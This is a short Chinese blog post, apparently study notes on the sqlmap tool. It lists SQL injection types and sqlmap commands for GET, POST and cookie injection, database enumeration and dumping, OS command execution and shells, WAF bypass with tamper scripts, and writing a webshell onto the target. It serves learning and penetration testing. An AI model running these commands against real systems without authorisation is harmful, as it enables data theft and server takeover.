sqlmap学习

Posted 歇马

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap学习相关的知识,希望对你有一定的参考价值。

SQL注入

  • 基于bool盲注 即可以根据返回页面判断条件真假注入
  • 基于时间的盲注,用条件语句查看时间延迟
  • 语句是否执行(即页面返回时间是否增加)来判断
  • 基于报错注入
  • 联合查询注入
  • 堆查询注入

三种方式

1.GET方式

[https://www.jianshu.com/p/fcdc0f86633a] [https://mp.weixin.qq.com/s?__biz=MzI3NzIzMzg3Mw==&mid=100000054&idx=1&sn=71f6c214f3833d9ca20b9f7dcd9d33e4#rd]

get与Post的区别,其中get参数通过url传递,poet放在request body中

sqlmap -u "URL"

2.POST方式

POST传递的参数要抓包才能看到

sqlmap -u "URL" --data "xx=yy"

sqlmap.py -r search-test.txt -p tfUPass [Text中的内容可以通过BP抓包获得POST参数]

3.Cookie方式

sqlmap -u "URL" --cookie "Cookie数据"

 

 mysql注入

sqlmap -u "url" --current-db //获取库名

--tables -D "库名"

--columns -T "表名" -D “列名”

--dump

 

延时注入在什么情况下使用:页面无变化、无法用布尔真假判断、无法报错的情况下可以使用延时注入

--delay 1

-safe-freq

 

SQLMAP进行命令执行(提权)

sqlmap -u "url" --os-cmd=”命令“(使用交互式参数要知道网站的绝对路径)

--os-shell 交互式命令实现和文件上传两个php页面

Tamper 绕WAF

--tamper="脚本名字"

本地写入webshell --file-write "./mst/mst.txt"(本地文件的地址)

目标文件的地址路径 --file-dest "d:/www/1.html"

 

结合BP批量检测

sqlmap -l burp.log --batch -smart

batch:会自动选择yes smart:启发式快速判断,节约时间

 

以上是关于sqlmap学习的主要内容,如果未能解决你的问题,请参考以下文章

学习笔记 | sqlmap常用命令

安全牛学习笔记SQLMAP- 自动注入

Burosuite抓包Sqlmap学习Sql注入

bugku-writeup-MISC-富强民主

安全牛学习笔记SQLMAP自动注入

sqlmap学习笔记